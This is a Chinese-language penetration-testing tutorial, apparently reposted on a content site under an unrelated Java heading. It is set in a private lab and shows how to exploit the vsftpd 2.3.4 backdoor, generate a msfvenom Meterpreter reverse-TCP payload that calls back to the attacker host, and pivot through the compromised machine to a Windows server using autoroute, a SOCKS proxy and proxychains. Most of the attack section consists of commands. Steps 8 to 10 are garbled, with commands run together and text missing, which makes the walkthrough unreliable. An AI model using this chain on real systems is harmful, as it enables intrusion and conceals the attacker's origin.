java中的接口是类吗
328
2022-10-02
渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器(meterpreter内网渗透)
攻击机:Kali 192.168.75.10
跳板: Metasploitable2 192.168.75.130
目标机: Windows Server 2012 192.168.75.140
这里无法通过Kali(192.168.75.10)主机直接访问目标机(192.168.75.140),目标机只能通过跳板(192.168.75.130)访问,这里Kali(192.168.75.10)已经成功渗透跳板(192.168.75.130)主机,需要将已渗透主机(192.168.75.130)设置为跳板来访问目标机(192.168.75.140)。
如果直接通过攻击机(192.168.75.10)访问目标机(192.168.75.140),会出现如下错误:
这里,跳板(192.168.75.130)拥有连接目标机(192.168.75.140)权限。因此需要一些方法将我们对目标机(192.168.75.140)发起的请求通过跳板(192.168.75.130)转发出去,需要的这种技术方法就是跳板技术。
这里,我们首先要渗透跳板(192.168.75.130)主机。具体步骤如下:
1.开启MSF
msfconsole
2.扫描指定主机的服务和端口
nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130
如果要存入MSF的数据库,则:
db_nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130
3.列出在目标端口上运行的服务
services
4.过滤服务,只显示开启的服务
services -u
5.列出数据库中所有的主机
hosts
6.漏洞攻击
use exploit/unix/ftp/vsftpd_234_backdoorshow optionsset RHOST 192.168.75.130set RPORT 21show payloadsset payload cmd/unix/interactexploit
注:所有操作都是在MSF终端下
这里,我们继续将Shell控制升级为Meterpreter命令行。
在攻击机Kali上重新开启一个终端:
7.生成反弹木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.75.10 LPORT 4444 -f elf > backdoor.elf
注:elf是Linux系统下的默认扩展名
8.启动Kali上的Apache服务,并将backdoor.elf放置到服务器中
service apache2 startmv backdoor.elf /var/exploit/multi/handlerset payload linux/x86/meterpreter/reverse_tcpset LHOST 192.168.75.10set LPORT 4444exploit
11.在目标机上运行木马文件
切换到第6步的终端,执行命令:
chmod 7777 backdoor.elf./backdoor.elf
12.查看反弹的Meterpreter终端
回到新开启的终端上查看,此时,我们看到已经反弹回Meterpreter命令行了。
接下来,就可以在Meterpreter终端进行操作了。
下面,我们需要执行autoroute脚本,并使用-s将脚本的参数设定为目标主机(192.168.75.140)的IP地址,这样我们就可以在已经被我们渗透的跳板机(192.168.75.130)上添加一条到达目标主机(192.168.75.140)的路由。
13.添加路由
run autoroute -prun autoroute -s 192.168.75.140run autoroute -p
以攻击者(192.168.75.10)的角度看,现在需要启动一个可以将请求通过Meterpreter发送给目标的模块。可以选择auxiliary/server/socks4a这个模块。
14.启动监听
在攻击机(192.168.75.10)上执行如下命令:
use auxiliary/server/socks4ashow optionsset SRVHOST 127.0.0.1set SRVPORT 1080run
15.配置攻击机(192.168.75.10)/etc/proxychains.conf
添加下面一行配置:
socks4 127.0.0.1 1080
16.配置Forefox代理
再一次打开目标服务器(192.168.75.140)的限制目录下的网页。
这里,我们就可以访问了。
接下来,我们访问下目标服务器(192.168.75.140)服务器的IP记录器,如下:
可以看到是跳板(192.168.75.130)的IP地址,不管我们对目标服务器(192.168.75.140)做了什么,对目标服务器(192.168.75.140)眼中这一切都是跳板机(192.168.75.130)做的。然而,我们的真实IP确是192.168.75.10。
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~